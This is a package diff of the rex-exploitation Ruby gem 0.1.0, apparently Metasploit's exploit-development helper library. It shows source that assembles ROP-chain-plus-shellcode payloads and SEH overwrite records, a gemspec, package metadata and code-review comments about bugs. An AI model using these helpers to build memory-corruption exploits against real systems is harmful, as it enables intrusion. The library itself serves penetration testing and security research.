rex-exploitation 0.1.0
- checksums.yaml +7 -0
- checksums.yaml.gz.sig +0 -0
- data.tar.gz.sig +1 -0
- data/.gitignore +9 -0
- data/.rspec +2 -0
- data/.travis.yml +5 -0
- data/CODE_OF_CONDUCT.md +74 -0
- data/Gemfile +4 -0
- data/README.md +33 -0
- data/Rakefile +6 -0
- data/bin/console +14 -0
- data/bin/setup +8 -0
- data/data/exploits/cmdstager/debug_asm +91 -0
- data/data/exploits/cmdstager/debug_write +819 -0
- data/data/exploits/cmdstager/vbs_b64 +40 -0
- data/data/exploits/cmdstager/vbs_b64_adodb +50 -0
- data/data/exploits/cmdstager/vbs_b64_noquot +49 -0
- data/data/exploits/cmdstager/vbs_b64_sleep +41 -0
- data/data/js/detect/ie_addons.js +89 -0
- data/data/js/detect/misc_addons.js +157 -0
- data/data/js/detect/os.js +831 -0
- data/data/js/memory/explib2/lib/explib2.js +426 -0
- data/data/js/memory/explib2/payload/drop_exec.js +33 -0
- data/data/js/memory/explib2/payload/exec.js +10 -0
- data/data/js/memory/heap_spray.js +17 -0
- data/data/js/memory/heaplib2.js +192 -0
- data/data/js/memory/mstime_malloc.js +31 -0
- data/data/js/memory/property_spray.js +38 -0
- data/data/js/network/ajax_download.js +18 -0
- data/data/js/network/ajax_post.js +18 -0
- data/data/js/network/xhr_shim.js +15 -0
- data/data/js/utils/base64.js +126 -0
- data/data/ropdb/flash.xml +80 -0
- data/data/ropdb/hxds.xml +66 -0
- data/data/ropdb/java.xml +33 -0
- data/data/ropdb/msvcrt.xml +71 -0
- data/data/ropdb/reader.xml +132 -0
- data/data/ropdb/samba.xml +436 -0
- data/data/ropdb/stagefright.xml +225 -0
- data/lib/rex/exploitation.rb +7 -0
- data/lib/rex/exploitation/cmdstager.rb +11 -0
- data/lib/rex/exploitation/cmdstager/base.rb +189 -0
- data/lib/rex/exploitation/cmdstager/bourne.rb +118 -0
- data/lib/rex/exploitation/cmdstager/certutil.rb +114 -0
- data/lib/rex/exploitation/cmdstager/debug_asm.rb +139 -0
- data/lib/rex/exploitation/cmdstager/debug_write.rb +133 -0
- data/lib/rex/exploitation/cmdstager/echo.rb +166 -0
- data/lib/rex/exploitation/cmdstager/printf.rb +121 -0
- data/lib/rex/exploitation/cmdstager/tftp.rb +70 -0
- data/lib/rex/exploitation/cmdstager/vbs.rb +125 -0
- data/lib/rex/exploitation/egghunter.rb +423 -0
- data/lib/rex/exploitation/encryptjs.rb +79 -0
- data/lib/rex/exploitation/heaplib.js.b64 +331 -0
- data/lib/rex/exploitation/heaplib.rb +107 -0
- data/lib/rex/exploitation/js.rb +6 -0
- data/lib/rex/exploitation/js/detect.rb +70 -0
- data/lib/rex/exploitation/js/memory.rb +80 -0
- data/lib/rex/exploitation/js/network.rb +83 -0
- data/lib/rex/exploitation/js/utils.rb +32 -0
- data/lib/rex/exploitation/jsobfu.rb +17 -0
- data/lib/rex/exploitation/obfuscatejs.rb +336 -0
- data/lib/rex/exploitation/omelet.rb +321 -0
- data/lib/rex/exploitation/opcodedb.rb +819 -0
- data/lib/rex/exploitation/ropdb.rb +190 -0
- data/lib/rex/exploitation/seh.rb +93 -0
- data/lib/rex/exploitation/version.rb +5 -0
- data/rex-exploitation.gemspec +35 -0
- metadata +298 -0
- metadata.gz.sig +0 -0
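--- /dev/null
+++ b/data/lib/rex/exploitation/ropdb.rb
@@ -0,0 +1,190 @@
+# -*- coding: binary -*-
+require 'rex/text'
+require 'rexml/document'
+
+
+module Rex
+module Exploitation
+
+###
+#
+# This class provides methods to access the ROP database, in order to generate
+# a ROP-compatible payload on the fly.
+#
+###
+class RopDb
+def initialize
+@base_path = File.join(File.dirname(__FILE__), '../../../data/ropdb/')
+end
+
+public
+
+
+#
+# Returns true if a ROP chain is available, otherwise false
+#
+def has_rop?(rop_name)
+File.exist?(File.join(@base_path, "#{rop_name}.xml"))
+end
+
+#
+# Returns an array of ROP gadgets. Each gadget can either be an offset, or a value (symbol or
+# some integer). When the value is a symbol, it can be one of these: :nop, :junk, :size,
+# :unsafe_negate_size, and :safe_negate_size
+# Note if no RoP is found, it returns an empry array.
+# Arguments:
+# rop_name - name of the ROP chain.
+# opts - A hash of optional arguments:
+# 'target' - A regex string search against the compatibility list.
+# 'base' - Specify a different base for the ROP gadgets.
+#
+def select_rop(rop, opts={})
+target = opts['target'] || ''
+base = opts['base'] || nil
+
+raise RuntimeError, "#{rop} ROP chain is not available" if not has_rop?(rop)
+xml = load_rop(File.join(@base_path, "#{rop}.xml"))
+
+gadgets = []
+
+xml.elements.each("db/rop") { |e|
+name = e.attributes['name']
+next if not has_target?(e, target)
+
+if not base
+default = e.elements['gadgets'].attributes['base'].scan(/^0x([0-9a-f]+)$/i).flatten[0]
+base = default.to_i(16)
+end
+
+gadgets << parse_gadgets(e, base)
+}
+return gadgets.flatten
+end
+
+
+#
+# Returns a payload with the user-supplied stack-pivot, a ROP chain,
+# and then shellcode.
+# Arguments:
+# rop - Name of the ROP chain
+# payload - Payload in binary
+# opts - A hash of optional arguments:
+# 'nop' - Used to generate nops with generate_sled()
+# 'badchars' - Used in a junk gadget
+# 'pivot' - Stack pivot in binary
+# 'target' - A regex string search against the compatibility list.
+# 'base' - Specify a different base for the ROP gadgets.
+#
+def generate_rop_payload(rop, payload, opts={})
+nop = opts['nop'] || nil
+badchars = opts['badchars'] || ''
+pivot = opts['pivot'] || ''
+target = opts['target'] || ''
+base = opts['base'] || nil
+
+rop = select_rop(rop, {'target'=>target, 'base'=>base})
+# Replace the reserved words with actual gadgets
+rop = rop.map {|e|
+if e == :nop
+sled = (nop) ? nop.generate_sled(4, badchars).unpack("V*")[0] : 0x90909090
+elsif e == :junk
+Rex::Text.rand_text(4, badchars).unpack("V")[0].to_i
+elsif e == :size
+payload.length
+elsif e == :unsafe_negate_size
+get_unsafe_size(payload.length)
+elsif e == :safe_negate_size
+get_safe_size(payload.length)
+else
+e
+end
+}.pack("V*")
+
+raise RuntimeError, "No ROP chain generated successfully" if rop.empty?
+
+return pivot + rop + payload
+end
+
+private
+
+
+#
+# Returns a size that's safe from null bytes.
+# This function will keep incrementing the value of "s" until it's safe from null bytes.
+#
+def get_safe_size(s)
+safe_size = get_unsafe_size(s)
+while (safe_size.to_s(16).rjust(8, '0')).scan(/../).include?("00")
+safe_size -= 1
+end
+
+safe_size
+end
+
+
+#
+# Returns a size that might contain one or more null bytes
+#
+def get_unsafe_size(s)
+0xffffffff - s + 1
+end
+
+
+#
+# Checks if a ROP chain is compatible
+#
+def has_target?(rop, target)
+rop.elements.each('compatibility/target') { |t|
+return true if t.text =~ /#{target}/i
+}
+return false
+end
+
+#
+# Returns the database in XML
+#
+def load_rop(file_path)
+f = File.open(file_path, 'rb')
+xml = REXML::Document.new(f.read(f.stat.size))
+f.close
+return xml
+end
+
+
+#
+# Returns gadgets
+#
+def parse_gadgets(e, image_base)
+gadgets = []
+e.elements.each('gadgets/gadget') { |g|
+offset = g.attributes['offset']
+value = g.attributes['value']
+
+if offset
+addr = offset.scan(/^0x([0-9a-f]+)$/i).flatten[0]
+gadgets << (image_base + addr.to_i(16))
+elsif value
+case value
+when 'nop'
+gadgets << :nop
+when 'junk'
+gadgets << :junk
+when 'size'
+gadgets << :size
+when 'unsafe_negate_size'
+gadgets << :unsafe_negate_size
+when 'safe_negate_size'
+gadgets << :safe_negate_size
+else
+gadgets << value.to_i(16)
+end
+else
+raise RuntimeError, "Missing offset or value attribute in '#{name}'"
+end
+}
+return gadgets
+end
+end
+
+end
+end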
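Review bot: `parse_gadgets` interpolates `name` into its RuntimeError message, but `name` is only a local of the block inside `select_rop`, so a gadget element with neither attribute raises NameError instead of the intended error; use `raise RuntimeError, "Missing offset or value attribute in '#{e.attributes['name']}'"` (the then-unused `name` local in `select_rop` can go). In `select_rop`, `base` is assigned inside the `db/rop` loop from the first entry that matches `target` and never reset, so a second matching entry inherits the first entry's base instead of its own `gadgets/@base`; if entries are meant to be mutually exclusive per target this is harmless, otherwise compute the default into a per-iteration local. The header comment on `get_safe_size` says the value keeps incrementing while the loop does `safe_size -= 1`; the comment should say decrementing. `load_rop` leaves the file handle open if REXML raises on malformed XML; `File.open(file_path, 'rb') { |f| REXML::Document.new(f.read) }` closes it on every path.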
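--- /dev/null
+++ b/data/lib/rex/exploitation/seh.rb
@@ -0,0 +1,93 @@
+# -*- coding: binary -*-
+require 'rex/text'
+require 'rex/arch/x86'
+
+module Rex
+module Exploitation
+
+###
+#
+# This class provides methods for generating SEH registration records
+# in a dynamic and flexible fashion. The records can be generated with
+# the short jump at a random offset into the next pointer and with random
+# padding in between the handler and the attacker's payload.
+#
+###
+class Seh
+
+#
+# Creates a new instance of the class and initializes it with the supplied
+# bad character list. The space argument denotes how much room is
+# available for random padding and the NOP argument can be used to generate
+# a random NOP sled that is better than 0x90.
+#
+def initialize(badchars = nil, space = nil, nop = nil)
+self.badchars = badchars || ''
+self.space = (space && space > 121) ? 121 : space
+self.nop = nop
+end
+
+#
+# Generates an SEH record
+#
+def generate_seh_record(handler, dynamic=false)
+if (dynamic)
+generate_dynamic_seh_record(handler)
+else
+generate_static_seh_record(handler)
+end
+end
+
+#
+# Generates a fake SEH registration record with the supplied handler
+# address for the handler, and a nop generator to use when generating
+# padding inside the next pointer. The NOP generator must implement the
+# 'generate_sled' method that takes a length and a list of bad
+# characters.
+#
+def generate_dynamic_seh_record(handler)
+
+# Generate the padding up to the size specified or 121 characters
+# maximum to account for the maximum range of a short jump plus the
+# record size.
+pad = rand(space || 121)
+rsize = pad + 8
+
+# Calculate the random index into the next ptr to store the short jump
+# instruction
+jmpidx = rand(3)
+
+# Build the prefixed sled for the bytes that come before the short jump
+# instruction
+sled = (nop) ? nop.generate_sled(jmpidx, badchars) : ("\x90" * jmpidx)
+
+# Seed the record and any space after the record with random text
+record = Rex::Text.rand_text(rsize, badchars)
+
+# Build the next pointer and short jump instruction
+record[jmpidx, 2] = Rex::Arch::X86.jmp_short((rsize - jmpidx) - 2)
+record[0, jmpidx] = sled
+
+# Set the handler in the registration record
+record[4, 4] = [ handler ].pack('V')
+
+# Return the generated record to the caller
+record
+end
+
+#
+# Generates a static SEH registration record with a specific handler and
+# next pointer.
+#
+def generate_static_seh_record(handler)
+"\xeb\x06" + Rex::Text.rand_text(2, badchars) + [ handler ].pack('V')
+end
+
+protected
+
+attr_accessor :badchars, :space, :nop # :nodoc:
+
+end
+
+end
+end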
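Review bot: `pad = rand(space || 121)` in `generate_dynamic_seh_record` yields a Float when `space` is 0, because `0` is truthy in Ruby and `Kernel#rand(0)` returns a float in [0, 1); `rsize` then becomes a Float and is passed on to `Rex::Text.rand_text` and `Rex::Arch::X86.jmp_short`. A guard such as `pad = (space.nil? || space > 0) ? rand(space || 121) : 0` fixes it, or `initialize` could reject a non-positive `space` with an ArgumentError. The same method assumes `nop.generate_sled(jmpidx, badchars)` returns exactly `jmpidx` bytes, since `record[0, jmpidx] = sled` would otherwise change the record length and shift the short jump and handler that follow; a comment on the `sled` line stating that contract would help implementers of the NOP generator. `generate_static_seh_record` emits the fixed bytes `"\xeb\x06"` without checking them against `badchars`; a one-line comment noting that the caller must ensure those two bytes are permitted would make the limitation visible.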
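--- /dev/null
+++ b/data/rex-exploitation.gemspec
@@ -0,0 +1,35 @@
+# coding: utf-8
+lib = File.expand_path('../lib', __FILE__)
+$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
+require 'rex/exploitation/version'
+
+Gem::Specification.new do |spec|
+spec.name = "rex-exploitation"
+spec.version = Rex::Exploitation::VERSION
+spec.authors = ["David Maloney"]
+spec.email = ["DMaloney@rapid7.com"]
+
+spec.summary = %q{Ruby Exploitation(Rex) library for various exploitation helpers}
+spec.description = %q{This gem contains various helper mechanisms for creating exploits.
+This includes SEH Overwrite helpers, egghunters, command stagers and more.}
+spec.homepage = "https://github.com/rapid7/rex-exploitation"
+
+
+spec.files = `git ls-files -z`.split("\x0").reject do |f|
+f.match(%r{^(test|spec|features)/})
+end
+spec.bindir = "exe"
+spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
+spec.require_paths = ["lib"]
+
+spec.add_development_dependency "bundler", "~> 1.13"
+spec.add_development_dependency "rake", "~> 10.0"
+spec.add_development_dependency "rspec", "~> 3.0"
+
+spec.add_runtime_dependency 'rex-text'
+spec.add_runtime_dependency 'rex-arch'
+spec.add_runtime_dependency 'rex-encoder'
+spec.add_runtime_dependency 'metasm'
+# Needed for Javascript obfuscation
+spec.add_runtime_dependency 'jsobfu'
+end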
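Review bot: No `spec.license` is set, and the generated metadata in this same release records `licenses: []`, so consumers cannot determine the terms of use from the gem itself; add `spec.license = "<LICENSE-ID-PLACEHOLDER>"` next to `spec.homepage`, filled in with the project's actual SPDX identifier. The `spec.files` line shells out to `git ls-files -z`, which ties packaging to a git checkout and silently yields an empty file list when the gemspec is evaluated elsewhere; that is the standard bundler template, but a short comment saying the gem must be built from the repository would save the next maintainer a surprise.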
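--- /dev/null
+++ b/metadata
@@ -0,0 +1,298 @@
+--- !ruby/object:Gem::Specification
+name: rex-exploitation
+version: !ruby/object:Gem::Version
+version: 0.1.0
+platform: ruby
+authors:
+- David Maloney
+autorequire:
+bindir: exe
+cert_chain:
+- |
+-----BEGIN CERTIFICATE-----
+MIIDdTCCAl2gAwIBAgILBAAAAAABFUtaw5QwDQYJKoZIhvcNAQEFBQAwVzELMAkG
+A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv
+b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw05ODA5MDExMjAw
+MDBaFw0yODAxMjgxMjAwMDBaMFcxCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i
+YWxTaWduIG52LXNhMRAwDgYDVQQLEwdSb290IENBMRswGQYDVQQDExJHbG9iYWxT
+aWduIFJvb3QgQ0EwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQDaDuaZ
+jc6j40+Kfvvxi4Mla+pIH/EqsLmVEQS98GPR4mdmzxzdzxtIK+6NiY6arymAZavp
+xy0Sy6scTHAHoT0KMM0VjU/43dSMUBUc71DuxC73/OlS8pF94G3VNTCOXkNz8kHp
+1Wrjsok6Vjk4bwY8iGlbKk3Fp1S4bInMm/k8yuX9ifUSPJJ4ltbcdG6TRGHRjcdG
+snUOhugZitVtbNV4FpWi6cgKOOvyJBNPc1STE4U6G7weNLWLBYy5d4ux2x8gkasJ
+U26Qzns3dLlwR5EiUWMWea6xrkEmCMgZK9FGqkjWZCrXgzT/LCrBbBlDSgeF59N8
+9iFo7+ryUp9/k5DPAgMBAAGjQjBAMA4GA1UdDwEB/wQEAwIBBjAPBgNVHRMBAf8E
+BTADAQH/MB0GA1UdDgQWBBRge2YaRQ2XyolQL30EzTSo//z9SzANBgkqhkiG9w0B
+AQUFAAOCAQEA1nPnfE920I2/7LqivjTFKDK1fPxsnCwrvQmeU79rXqoRSLblCKOz
+yj1hTdNGCbM+w6DjY1Ub8rrvrTnhQ7k4o+YviiY776BQVvnGCv04zcQLcFGUl5gE
+38NflNUVyRRBnMRddWQVDf9VMOyGj/8N7yy5Y0b2qvzfvGn9LhJIZJrglfCm7ymP
+AbEVtQwdpf5pLGkkeB6zpxxxYu7KyJesF12KwvhHhm4qxFYxldBniYUr+WymXUad
+DKqC5JlR3XC321Y9YeRq4VzW9v493kHMB65jUr9TU/Qr6cf9tveCX4XSQRjbgbME
+HMUfpIBvFSDJ3gyICh3WZlXi/EjJKSZp4A==
+-----END CERTIFICATE-----
+- |
+-----BEGIN CERTIFICATE-----
+MIIEKDCCAxCgAwIBAgILBAAAAAABL07hNVwwDQYJKoZIhvcNAQEFBQAwVzELMAkG
+A1UEBhMCQkUxGTAXBgNVBAoTEEdsb2JhbFNpZ24gbnYtc2ExEDAOBgNVBAsTB1Jv
+b3QgQ0ExGzAZBgNVBAMTEkdsb2JhbFNpZ24gUm9vdCBDQTAeFw0xMTA0MTMxMDAw
+MDBaFw0xOTA0MTMxMDAwMDBaMFExCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9i
+YWxTaWduIG52LXNhMScwJQYDVQQDEx5HbG9iYWxTaWduIENvZGVTaWduaW5nIENB
+IC0gRzIwggEiMA0GCSqGSIb3DQEBAQUAA4IBDwAwggEKAoIBAQCyTxTnEL7XJnKr
+NpfvU79ChF5Y0Yoo/ENGb34oRFALdV0A1zwKRJ4gaqT3RUo3YKNuPxL6bfq2RsNq
+o7gMJygCVyjRUPdhOVW4w+ElhlI8vwUd17Oa+JokMUnVoqni05GrPjxz7/Yp8cg1
+0DB7f06SpQaPh+LO9cFjZqwYaSrBXrta6G6V/zuAYp2Zx8cvZtX9YhqCVVrG+kB3
+jskwPBvw8jW4bFmc/enWyrRAHvcEytFnqXTjpQhU2YM1O46MIwx1tt6GSp4aPgpQ
+STic0qiQv5j6yIwrJxF+KvvO3qmuOJMi+qbs+1xhdsNE1swMfi9tBoCidEC7tx/0
+O9dzVB/zAgMBAAGjgfowgfcwDgYDVR0PAQH/BAQDAgEGMBIGA1UdEwEB/wQIMAYB
+Af8CAQAwHQYDVR0OBBYEFAhu2Lacir/tPtfDdF3MgB+oL1B6MEcGA1UdIARAMD4w
+PAYEVR0gADA0MDIGCCsGAQUFBwIBFiZodHRwczovL3d3dy5nbG9iYWxzaWduLmNv
+bS9yZXBvc2l0b3J5LzAzBgNVHR8ELDAqMCigJqAkhiJodHRwOi8vY3JsLmdsb2Jh
+bHNpZ24ubmV0L3Jvb3QuY3JsMBMGA1UdJQQMMAoGCCsGAQUFBwMDMB8GA1UdIwQY
+MBaAFGB7ZhpFDZfKiVAvfQTNNKj//P1LMA0GCSqGSIb3DQEBBQUAA4IBAQAiXMXd
+PfQLcNjj9efFjgkBu7GWNlxaB63HqERJUSV6rg2kGTuSnM+5Qia7O2yX58fOEW1o
+kdqNbfFTTVQ4jGHzyIJ2ab6BMgsxw2zJniAKWC/wSP5+SAeq10NYlHNUBDGpeA07
+jLBwwT1+170vKsPi9Y8MkNxrpci+aF5dbfh40r5JlR4VeAiR+zTIvoStvODG3Rjb
+88rwe8IUPBi4A7qVPiEeP2Bpen9qA56NSvnwKCwwhF7sJnJCsW3LZMMSjNaES2dB
+fLEDF3gJ462otpYtpH6AA0+I98FrWkYVzSwZi9hwnOUtSYhgcqikGVJwQ17a1kYD
+sGgOJO9K9gslJO8k
+-----END CERTIFICATE-----
+- |
+-----BEGIN CERTIFICATE-----
+MIIEyjCCA7KgAwIBAgISESEyE8rNriS4+1dc8jOHEUL8MA0GCSqGSIb3DQEBBQUA
+MFExCzAJBgNVBAYTAkJFMRkwFwYDVQQKExBHbG9iYWxTaWduIG52LXNhMScwJQYD
+VQQDEx5HbG9iYWxTaWduIENvZGVTaWduaW5nIENBIC0gRzIwHhcNMTMxMDExMTUx
+NTM4WhcNMTYxMDExMTUxNTM4WjBgMQswCQYDVQQGEwJVUzEWMBQGA1UECBMNTWFz
+c2FjaHVzZXR0czEPMA0GA1UEBxMGQm9zdG9uMRMwEQYDVQQKEwpSYXBpZDcgTExD
+MRMwEQYDVQQDEwpSYXBpZDcgTExDMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIB
+CgKCAQEAhD//7+739c69hssg0mD6CXgf2JkuWTcU81dgD7aKcoEPqU8e1FseBvDW
+/Q5fNK2H2NgHV/Msn18zXuK0PkaJXqj/vDsuKB3Hq0BiR2AwyDdEw8K5MK5bgQc2
+tmcVtEAejRoy1Uv5UyfaAYAxG6zsma3buV1fjnEAC3VouRg4+EX/f65H/a6srntK
+5Etp3D71k2f0oUl8dOqOmSsRJQQ5zSs4ktDvpjAmsvzoA+1svceLYU95mvQsIw2T
+edpmibGMwGw/HmgV+YWBgF5UGvax6zbC2i6DF2YHnDfkNb8/1MEIaxOTAbJTazTK
+8laCQOyay6L1BNPQKjZBgOge8LZq1wIDAQABo4IBizCCAYcwDgYDVR0PAQH/BAQD
+AgeAMEwGA1UdIARFMEMwQQYJKwYBBAGgMgEyMDQwMgYIKwYBBQUHAgEWJmh0dHBz
+Oi8vd3d3Lmdsb2JhbHNpZ24uY29tL3JlcG9zaXRvcnkvMAkGA1UdEwQCMAAwEwYD
+VR0lBAwwCgYIKwYBBQUHAwMwPgYDVR0fBDcwNTAzoDGgL4YtaHR0cDovL2NybC5n
+bG9iYWxzaWduLmNvbS9ncy9nc2NvZGVzaWduZzIuY3JsMIGGBggrBgEFBQcBAQR6
+MHgwQAYIKwYBBQUHMAKGNGh0dHA6Ly9zZWN1cmUuZ2xvYmFsc2lnbi5jb20vY2Fj
+ZXJ0L2dzY29kZXNpZ25nMi5jcnQwNAYIKwYBBQUHMAGGKGh0dHA6Ly9vY3NwMi5n
+bG9iYWxzaWduLmNvbS9nc2NvZGVzaWduZzIwHQYDVR0OBBYEFE536JwFx9SpaEi3
+w8pcq2GRFA5BMB8GA1UdIwQYMBaAFAhu2Lacir/tPtfDdF3MgB+oL1B6MA0GCSqG
+SIb3DQEBBQUAA4IBAQAGpGXHtFLjTTivV+xQPwtZhfPuJ7f+VGTMSAAYWmfzyHXM
+YMFYUWJzSFcuVR2YfxtbS45P7U5Qopd7jBQ0Ygk5h2a+B5nE4+UlhHj665d0zpYM
+1eWndMaO6WBOYnqtNyi8Dqqc1foKZDNHEDggYhGso7OIBunup+N4sPL9PwQ3eYe6
+mUu8z0E4GXYViaMPOFkqaYnoYgf2L+7L5zKYT4h/NE/P7kj7EbduHgy/v/aAIrNl
+2SpuQH+SWteq3NXkAmFEEqvLJQ4sbptZt8OP8ghL3pVAvZNFmww/YVszSkShSzcg
+QdihYCSEL2drS2cFd50jBeq71sxUtxbv82DUa2b+
+-----END CERTIFICATE-----
+date: 2016-10-03 00:00:00.000000000 Z
+dependencies:
+- !ruby/object:Gem::Dependency
+name: bundler
+requirement: !ruby/object:Gem::Requirement
+requirements:
+- - "~>"
+- !ruby/object:Gem::Version
+version: '1.13'
+type: :development
+prerelease: false
+version_requirements: !ruby/object:Gem::Requirement
+requirements:
+- - "~>"
+- !ruby/object:Gem::Version
+version: '1.13'
+- !ruby/object:Gem::Dependency
+name: rake
+requirement: !ruby/object:Gem::Requirement
+requirements:
+- - "~>"
+- !ruby/object:Gem::Version
+version: '10.0'
+type: :development
+prerelease: false
+version_requirements: !ruby/object:Gem::Requirement
+requirements:
+- - "~>"
+- !ruby/object:Gem::Version
+version: '10.0'
+- !ruby/object:Gem::Dependency
+name: rspec
+requirement: !ruby/object:Gem::Requirement
+requirements:
+- - "~>"
+- !ruby/object:Gem::Version
+version: '3.0'
+type: :development
+prerelease: false
+version_requirements: !ruby/object:Gem::Requirement
+requirements:
+- - "~>"
+- !ruby/object:Gem::Version
+version: '3.0'
+- !ruby/object:Gem::Dependency
+name: rex-text
+requirement: !ruby/object:Gem::Requirement
+requirements:
+- - ">="
+- !ruby/object:Gem::Version
+version: '0'
+type: :runtime
+prerelease: false
+version_requirements: !ruby/object:Gem::Requirement
+requirements:
+- - ">="
+- !ruby/object:Gem::Version
+version: '0'
+- !ruby/object:Gem::Dependency
+name: rex-arch
+requirement: !ruby/object:Gem::Requirement
+requirements:
+- - ">="
+- !ruby/object:Gem::Version
+version: '0'
+type: :runtime
+prerelease: false
+version_requirements: !ruby/object:Gem::Requirement
+requirements:
+- - ">="
+- !ruby/object:Gem::Version
+version: '0'
+- !ruby/object:Gem::Dependency
+name: rex-encoder
+requirement: !ruby/object:Gem::Requirement
+requirements:
+- - ">="
+- !ruby/object:Gem::Version
+version: '0'
+type: :runtime
+prerelease: false
+version_requirements: !ruby/object:Gem::Requirement
+requirements:
+- - ">="
+- !ruby/object:Gem::Version
+version: '0'
+- !ruby/object:Gem::Dependency
+name: metasm
+requirement: !ruby/object:Gem::Requirement
+requirements:
+- - ">="
+- !ruby/object:Gem::Version
+version: '0'
+type: :runtime
+prerelease: false
+version_requirements: !ruby/object:Gem::Requirement
+requirements:
+- - ">="
+- !ruby/object:Gem::Version
+version: '0'
+- !ruby/object:Gem::Dependency
+name: jsobfu
+requirement: !ruby/object:Gem::Requirement
+requirements:
+- - ">="
+- !ruby/object:Gem::Version
+version: '0'
+type: :runtime
+prerelease: false
+version_requirements: !ruby/object:Gem::Requirement
+requirements:
+- - ">="
+- !ruby/object:Gem::Version
+version: '0'
+description: |-
+This gem contains various helper mechanisms for creating exploits.
+This includes SEH Overwrite helpers, egghunters, command stagers and more.
+email:
+- DMaloney@rapid7.com
+executables: []
+extensions: []
+extra_rdoc_files: []
+files:
+- ".gitignore"
+- ".rspec"
+- ".travis.yml"
+- CODE_OF_CONDUCT.md
+- Gemfile
+- README.md
+- Rakefile
+- bin/console
+- bin/setup
+- data/exploits/cmdstager/debug_asm
+- data/exploits/cmdstager/debug_write
+- data/exploits/cmdstager/vbs_b64
+- data/exploits/cmdstager/vbs_b64_adodb
+- data/exploits/cmdstager/vbs_b64_noquot
+- data/exploits/cmdstager/vbs_b64_sleep
+- data/js/detect/ie_addons.js
+- data/js/detect/misc_addons.js
+- data/js/detect/os.js
+- data/js/memory/explib2/lib/explib2.js
+- data/js/memory/explib2/payload/drop_exec.js
+- data/js/memory/explib2/payload/exec.js
+- data/js/memory/heap_spray.js
+- data/js/memory/heaplib2.js
+- data/js/memory/mstime_malloc.js
+- data/js/memory/property_spray.js
+- data/js/network/ajax_download.js
+- data/js/network/ajax_post.js
+- data/js/network/xhr_shim.js
+- data/js/utils/base64.js
+- data/ropdb/flash.xml
+- data/ropdb/hxds.xml
+- data/ropdb/java.xml
+- data/ropdb/msvcrt.xml
+- data/ropdb/reader.xml
+- data/ropdb/samba.xml
+- data/ropdb/stagefright.xml
+- lib/rex/exploitation.rb
+- lib/rex/exploitation/cmdstager.rb
+- lib/rex/exploitation/cmdstager/base.rb
+- lib/rex/exploitation/cmdstager/bourne.rb
+- lib/rex/exploitation/cmdstager/certutil.rb
+- lib/rex/exploitation/cmdstager/debug_asm.rb
+- lib/rex/exploitation/cmdstager/debug_write.rb
+- lib/rex/exploitation/cmdstager/echo.rb
+- lib/rex/exploitation/cmdstager/printf.rb
+- lib/rex/exploitation/cmdstager/tftp.rb
+- lib/rex/exploitation/cmdstager/vbs.rb
+- lib/rex/exploitation/egghunter.rb
+- lib/rex/exploitation/encryptjs.rb
+- lib/rex/exploitation/heaplib.js.b64
+- lib/rex/exploitation/heaplib.rb
+- lib/rex/exploitation/js.rb
+- lib/rex/exploitation/js/detect.rb
+- lib/rex/exploitation/js/memory.rb
+- lib/rex/exploitation/js/network.rb
+- lib/rex/exploitation/js/utils.rb
+- lib/rex/exploitation/jsobfu.rb
+- lib/rex/exploitation/obfuscatejs.rb
+- lib/rex/exploitation/omelet.rb
+- lib/rex/exploitation/opcodedb.rb
+- lib/rex/exploitation/ropdb.rb
+- lib/rex/exploitation/seh.rb
+- lib/rex/exploitation/version.rb
+- rex-exploitation.gemspec
+homepage: https://github.com/rapid7/rex-exploitation
+licenses: []
+metadata: {}
+post_install_message:
+rdoc_options: []
+require_paths:
+- lib
+required_ruby_version: !ruby/object:Gem::Requirement
+requirements:
+- - ">="
+- !ruby/object:Gem::Version
+version: '0'
+required_rubygems_version: !ruby/object:Gem::Requirement
+requirements:
+- - ">="
+- !ruby/object:Gem::Version
+version: '0'
+requirements: []
+rubyforge_project:
+rubygems_version: 2.4.8
+signing_key:
+specification_version: 4
+summary: Ruby Exploitation(Rex) library for various exploitation helpers
+test_files: []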